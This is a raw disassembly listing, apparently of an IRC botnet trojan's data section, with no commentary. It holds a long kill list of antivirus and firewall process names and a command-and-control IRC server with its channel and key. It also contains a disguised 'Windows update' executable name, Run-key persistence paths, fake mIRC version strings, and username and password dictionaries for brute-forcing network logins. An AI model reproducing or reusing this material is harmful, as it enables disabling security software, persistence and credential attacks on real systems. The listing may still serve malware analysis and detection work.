aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: .data:004220B4�o
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: .data:004220B0�o
align 4
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: .data:004220AC�o
align 4
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: .data:004220A8�o
align 4
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: .data:004220A4�o
align 10h
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: .data:004220A0�o
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: .data:0042209C�o
align 4
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: .data:00422098�o
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: .data:00422094�o
align 4
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: .data:00422090�o
; .data:004220DC�o
align 4
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: .data:0042208C�o
align 4
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: .data:00422088�o
align 10h
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: .data:00422080�o
; .data:00422084�o
align 10h
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: .data:0042207C�o
align 10h
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: .data:00422078�o
align 4
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: .data:00422074�o
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: .data:00422070�o
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: .data:0042206C�o
align 4
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: .data:00422068�o
align 4
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: .data:00422064�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: .data:00422060�o
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: .data:0042205C�o
align 4
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: .data:00422058�o
align 4
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: .data:00422054�o
align 4
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: .data:00422050�o
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: .data:0042204C�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: .data:00422048�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: .data:00422044�o
align 4
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: .data:00422040�o
align 4
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: .data:0042203C�o
align 4
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: .data:00422038�o
align 10h
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: .data:00422034�o
align 4
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: .data:00422030�o
align 10h
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: .data:0042202C�o
align 4
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: .data:00422028�o
align 4
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: .data:00422024�o
align 4
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: .data:00422020�o
align 4
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .data:0042201C�o
align 10h
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: .data:00422018�o
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: .data:00422014�o
align 4
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: .data:00422010�o
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: .data:00422008�o
; .data:0042200C�o
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: .data:00422004�o
align 10h
aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: .data:00422000�o
align 4
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: .data:00421FFC�o
align 4
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: .data:00421FF4�o
; .data:00421FF8�o
align 4
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: .data:00421FF0�o
align 10h
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: .data:00421FEC�o
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: .data:00421FE8�o
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: .data:00421FE4�o
align 4
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: .data:00421FE0�o
align 4
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: .data:00421FD8�o
; .data:00421FDC�o
align 4
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: .data:00421FD4�o
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: .data:00421FD0�o
align 4
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: .data:00421FCC�o
align 4
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: .data:00421FC8�o
align 4
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: .data:00421FC4�o
align 4
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: .data:00421FC0�o
aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: .data:00421FBC�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: .data:00421FB8�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: .data:00421FB4�o
align 4
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: .data:00421FB0�o
align 4
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: .data:00421FAC�o
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: .data:00421FA8�o
align 10h
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: .data:00421FA4�o
align 4
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: .data:00421FA0�o
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: .data:00421F9C�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: .data:00421F98�o
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: .data:00421F94�o
align 10h
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: .data:00421F90�o
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: .data:00421F8C�o
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: .data:00421F88�o
align 4
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: .data:00421F84�o
align 4
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: .data:00421F7C�o
; .data:00421F80�o
align 4
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: .data:00421F74�o
; .data:00421F78�o
align 4
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: .data:00421F6C�o
; .data:00421F70�o
align 4
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: .data:00421F64�o
; .data:00421F68�o
aAu_exe db 'AU.EXE',0 ; DATA XREF: .data:00421F60�o
align 4
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: .data:00421F5C�o
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: .data:00421F54�o
; .data:00421F58�o
align 4
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: .data:00421F50�o
align 4
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: .data:00421F4C�o
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: .data:00421F48�o
align 4
aArr_exe db 'ARR.EXE',0 ; DATA XREF: .data:00421F44�o
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: .data:00421F40�o
align 4
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: .data:00421F3C�o
align 4
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: .data:00421F38�o
align 4
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: .data:00421F34�o
align 10h
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: .data:00421F30�o
align 10h
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: .data:00421F2C�o
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: .data:00421F28�o
align 4
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: .data:00421F24�o
align 4
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: .data:00421F20�o
align 4
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: .data:00421F1C�o
align 4
aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: .data:00421F18�o
align 4
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: .data:00421F14�o
align 4
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: .data:00421F10�o
align 4
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: .data:00421F0C�o
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: .data:off_421F08�o
align 10h
; char aSD_0[]
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_4088B4+191�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_4088B4+5A�o
; sub_4088B4+1F3�o
align 10h
; char aProcProcessL_0[]
aProcProcessL_0 db '[PROC]: Process list failed.',0 ; DATA XREF: sub_408AE3:loc_408B6A�o
align 10h
aProcProcessLis db '[PROC]: Process list completed.',0 ; DATA XREF: sub_408AE3+80�o
; char aProcListingPro[]
aProcListingPro db '[PROC]: Listing processes:',0 ; DATA XREF: sub_408AE3+19�o
align 4
dword_424A3C dd 1B9h ; DATA XREF: WinMain(x,x,x,x)+519�r
; WinMain(x,x,x,x)+5CC�r
dword_424A40 dd 346h ; DATA XREF: WinMain(x,x,x,x)+618�r
dword_424A44 dd 1F41h ; DATA XREF: sub_409557:loc_40E5AD�r
dword_424A48 dd 45h ; DATA XREF: sub_4022E3+3B�r
; sub_409557+45A3�r
dword_424A4C dd 50h ; DATA XREF: sub_4022E3:loc_402592�r
; sub_409557:loc_40DBEC�r
dword_424A50 dd 201h ; DATA XREF: sub_409557:loc_40DD62�r
dword_424A54 dd 1 ; DATA XREF: sub_409557+649�r
dword_424A58 dd 1 ; DATA XREF: WinMain(x,x,x,x)+13D�r
dword_424A5C dd 1 ; DATA XREF: sub_40724A+C�r
; WinMain(x,x,x,x):loc_408F59�r
byte_424A60 db 7Ah ; DATA XREF: sub_403A12:loc_403A1E�r
; sub_409557+6B4�r ...
align 4
dword_424A64 dd 5 ; DATA XREF: sub_40F6CD+2B�r
; sub_40F6CD+51�r ...
; int dword_424A68
dword_424A68 dd 1 ; DATA XREF: sub_409277+78�r
; sub_409557+27C�r ...
; int dword_424A6C
dword_424A6C dd 1 ; DATA XREF: sub_409277+72�r
; sub_409557+276�r
; char aFenr[]
aFenr db 'FEnR',0 ; DATA XREF: WinMain(x,x,x,x)+5D�o
; sub_409557+35C2�o ...
align 4
aFenr_0 db 'FEnR',0 ; DATA XREF: sub_409557:loc_40E6B0�o
align 10h
; char a19736666386888[]
a19736666386888 db '19736666386888',0 ; DATA XREF: sub_409557+52D6�o
; sub_409557+53A5�o
align 10h
; char aFf_arabHacker_[]
aFf_arabHacker_ db 'ff.arab-hacker.org',0 ; DATA XREF: WinMain(x,x,x,x)+504�o
; WinMain(x,x,x,x)+5BD�o
align 4
; char aFf[]
aFf db '#ff',0 ; DATA XREF: WinMain(x,x,x,x)+525�o
; WinMain(x,x,x,x)+5D3�o
; char aFuckoff[]
aFuckoff db 'fuckoff',0 ; DATA XREF: WinMain(x,x,x,x)+53C�o
; WinMain(x,x,x,x)+5E5�o
; char aGvujaleodq_exe[]
aGvujaleodq_exe db 'gvujaleodq.exe',0 ; DATA XREF: sub_40119B+F�o
; .text:00401802�o ...
align 10h
aMscobngins_dat db 'mscobngins.dat',0
align 10h
aWindowsUpdate5 db 'Windows update 55',0 ; DATA XREF: sub_402FA4+E�o
align 4
aFf_1 db '[FF]-',0 ; DATA XREF: sub_40F6CD+12�o
align 4
aPay0load db 'pay0load',0
align 4
asc_424AF8 db '+x',0 ; DATA XREF: sub_409557+5425�o
align 4
; char aFf_0[]
aFf_0 db '#ff-',0 ; DATA XREF: sub_409557:loc_40C034�o
; sub_409557+4403�o
align 4
aFfkey db '#ffKey',0
align 4
aFa db '#fa',0
off_424B10 dd offset a@fofo ; DATA XREF: sub_409557:loc_40E889�o
; "*@fofo"
off_424B14 dd offset aMircV6_12Khale ; DATA XREF: sub_409557+82D�r
; sub_409557+534E�o
; "mIRC v6.12 Khaled Mardam-Bey"
dd offset aMircV6_03Khale ; "mIRC v6.03 Khaled Mardam-Bey"
dd offset aMirc32V5_82K_m ; "mIRC32 v5.82 K.Mardam-Bey"
dd offset aMirc32V6_01K_m ; "mIRC32 v6.01 K.Mardam-Bey"
dd offset aMirc32V6_03K_m ; "mIRC32 v6.03 K.Mardam-Bey"
dd offset aMirc32V6_12K_m ; "mIRC32 v6.12 K.Mardam-Bey"
dd offset aMircV5_71K_mar ; "mIRC v5.71 K.Mardam-Bey"
dd offset aMircV5_82K_mar ; "mIRC v5.82 K.Mardam-Bey"
dd offset aMircV6_01K_mar ; "mIRC v6.01 K.Mardam-Bey"
dd offset aMircV6_03K_mar ; "mIRC v6.03 K.Mardam-Bey"
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 4
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicr_1 db 'Software\Microsoft\OLE',0
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0
align 4
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
dd 0
dd offset byte_428D64
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_1 ; "server"
dd offset aRoot ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_2 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_0 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dword_424E64 dd 10h ; DATA XREF: sub_402C6B+72�w
; sub_409557+718�r ...
aIntranet db 'intranet',0 ; DATA XREF: .data:00424E50�o
align 4
aLan db 'lan',0 ; DATA XREF: .data:00424E48�o
aMain db 'main',0 ; DATA XREF: .data:00424E44�o
align 10h
aWinpass db 'winpass',0 ; DATA XREF: .data:00424E40�o
aBlank db 'blank',0 ; DATA XREF: .data:00424E3C�o
align 10h
aOffice db 'office',0 ; DATA XREF: .data:00424E38�o
align 4
aControl db 'control',0 ; DATA XREF: .data:00424E34�o
aXp_0 db 'xp',0 ; DATA XREF: .data:00424E30�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:00424E2C�o
align 4
aHp db 'hp',0 ; DATA XREF: .data:00424E28�o
align 10h
aSiemens db 'siemens',0 ; DATA XREF: .data:00424E24�o
aCompaq db 'compaq',0 ; DATA XREF: .data:00424E20�o
align 10h
aDell db 'dell',0 ; DATA XREF: .data:00424E1C�o
align 4
aCisco db 'cisco',0 ; DATA XREF: .data:00424E18�o
align 10h
aIbm db 'ibm',0 ; DATA XREF: .data:00424E14�o
aOrainstall db 'orainstall',0 ; DATA XREF: .data:00424E0C�o
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:00424E08�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:00424E04�o
aSa db 'sa',0 ; DATA XREF: .data:00424E00�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:00424DFC�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:00424DF4�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:00424DF0�o
align 4
aData db 'data',0 ; DATA XREF: .data:00424DEC�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:00424DE8�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:00424DE4�o
align 10h
aDbpass db 'dbpass',0 ; DATA XREF: .data:00424DE0�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:00424DDC�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:00424DD4�o
align 10h
aDomainpass db 'domainpass',0 ; DATA XREF: .data:00424DD0�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:00424DCC�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:00424DC8�o
align 4
aHell db 'hell',0 ; DATA XREF: .data:00424DC4�o
align 4
aGod db 'god',0 ; DATA XREF: .data:00424DC0�o
aSex db 'sex',0 ; DATA XREF: .data:00424DBC�o
aSlut db 'slut',0 ; DATA XREF: .data:00424DB8�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:00424DB4�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:00424DB0�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:00424DAC�o
align 10h
aBackup db 'backup',0 ; DATA XREF: .data:00424DA8�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:00424DA4�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:00424DA0�o
align 10h
aLogin db 'login',0 ; DATA XREF: .data:00424D9C�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:00424D98�o
align 10h
aKatie db 'katie',0 ; DATA XREF: .data:00424D94�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:00424D8C�o
align 10h
aGeorge db 'george',0 ; DATA XREF: .data:00424D88�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:00424D84�o
align 10h
aChris db 'chris',0 ; DATA XREF: .data:00424D80�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:00424D7C�o
aNeil db 'neil',0 ; DATA XREF: .data:00424D78�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:00424D74�o
aBrian db 'brian',0 ; DATA XREF: .data:00424D70�o
align 10h
aSusan db 'susan',0 ; DATA XREF: .data:00424D68�o
align 4
aSue db 'sue',0 ; DATA XREF: .data:00424D64�o
aSam db 'sam',0 ; DATA XREF: .data:00424D60�o
aLuke db 'luke',0 ; DATA XREF: .data:00424D5C�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:00424D58�o
; .data:00424D6C�o
align 10h
aJohn db 'john',0 ; DATA XREF: .data:00424D54�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:00424D50�o
align 10h
aBill db 'bill',0 ; DATA XREF: .data:00424D4C�o
align 4
aFred db 'fred',0 ; DATA XREF: .data:00424D48�o
align 10h
aJoe db 'joe',0 ; DATA XREF: .data:00424D44�o
aJen db 'jen',0 ; DATA XREF: .data:00424D40�o
aBob db 'bob',0 ; DATA XREF: .data:00424D3C�o
; .data:00424D90�o
aQwe db 'qwe',0 ; DATA XREF: .data:00424D38�o
aZxc db 'zxc',0 ; DATA XREF: .data:00424D34�o
aAsd db 'asd',0 ; DATA XREF: .data:00424D30�o
aQaz db 'qaz',0 ; DATA XREF: .data:00424D2C�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:00424D28�o
aWinnt db 'winnt',0 ; DATA XREF: .data:00424D24�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:00424D20�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:00424D1C�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .data:00424D18�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:00424D14�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:00424D10�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: .data:00424D0C�o
aOem db 'oem',0 ; DATA XREF: .data:00424D08�o
; char aUser_2[]
aUser_2 db 'user',0 ; DATA XREF: sub_409557+1A22�o
; .data:00424D04�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:00424D00�o
align 4
aHome db 'home',0 ; DATA XREF: .data:00424CFC�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: .data:00424CF8�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:00424CF4�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:00424CF0�o
; .data:00424E4C�o
align 4
aWww db 'www',0 ; DATA XREF: .data:00424CEC�o
aWeb db 'web',0 ; DATA XREF: .data:00424CE8�o
aOutlook db 'outlook',0 ; DATA XREF: .data:00424CE4�o
aMail db 'mail',0 ; DATA XREF: .data:00424CE0�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:00424CDC�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:00424CD8�o
align 4
aServer_1 db 'server',0 ; DATA XREF: .data:00424CD0�o
align 4
aSystem db 'system',0 ; DATA XREF: .data:00424CCC�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:00424CC4�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:00424CC0�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .data:00424CBC�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:00424CB8�o
align 10h
aNone db 'none',0 ; DATA XREF: .data:00424CB4�o
align 4
aTest db 'test',0 ; DATA XREF: .data:00424CAC�o
align 10h
a2004 db '2004',0 ; DATA XREF: .data:00424CA8�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_410E85+BA�o
; .data:00424CA4�o
align 10h
a2002 db '2002',0 ; DATA XREF: .data:00424CA0�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:00424C9C�o
align 10h
a2000 db '2000',0 ; DATA XREF: .data:00424C98�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:00424C94�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:00424C90�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: .data:00424C8C�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:00424C88�o
a123456 db '123456',0 ; DATA XREF: .data:00424C84�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:00424C80�o
align 4
a1234 db '1234',0 ; DATA XREF: .data:00424C7C�o
align 4
a123 db '123',0 ; DATA XREF: .data:00424C78�o
a12 db '12',0 ; DATA XREF: .data:00424C74�o
align 4
a1: ; DATA XREF: .data:00424C70�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:00424C6C�o
aPwd db 'pwd',0 ; DATA XREF: .data:00424C68�o
aPass_0 db 'pass',0 ; DATA XREF: .data:00424C64�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:00424C60�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:00424C5C�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:00424C58�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .data:00424C54�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:00424C50�o
aDb2 db 'db2',0 ; DATA XREF: .data:00424C2C�o
; .data:00424DF8�o
aOracle db 'oracle',0 ; DATA XREF: .data:00424C28�o
; .data:00424E10�o
align 4
aDba db 'dba',0 ; DATA XREF: .data:00424C24�o
aDatabase db 'database',0 ; DATA XREF: .data:00424C20�o
; .data:00424DD8�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:00424C1C�o
; .data:00424CC8�o
aGuest_0 db 'guest',0 ; DATA XREF: .data:00424C18�o
; .data:00424CB0�o
align 4
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:00424C14�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .data:00424C10�o
; .data:00424E58�o
aStudent db 'student',0 ; DATA XREF: .data:00424C0C�o
; .data:00424E54�o
aOwner db 'owner',0 ; DATA XREF: .data:00424C08�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:00424C04�o
align 4
aRoot db 'root',0 ; DATA XREF: .data:00424C00�o
; .data:00424CD4�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:00424BFC�o
; .data:00424E5C�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .data:00424BF8�o
; .data:00424C4C�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:00424BF4�o
; .data:00424C48�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:00424BF0�o
; .data:00424C44�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:00424BEC�o
; .data:00424C40�o
align 10h
aAdministrador db 'administrador',0 ; DATA XREF: .data:00424BE8�o
; .data:00424C3C�o
align 10h
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:00424BE4�o
; .data:00424C38�o
align 10h
aMircV6_03K_mar db 'mIRC v6.03 K.Mardam-Bey',0 ; DATA XREF: .data:00424B38�o
aMircV6_01K_mar db 'mIRC v6.01 K.Mardam-Bey',0 ; DATA XREF: .data:00424B34�o
aMircV5_82K_mar db 'mIRC v5.82 K.Mardam-Bey',0 ; DATA XREF: .data:00424B30�o
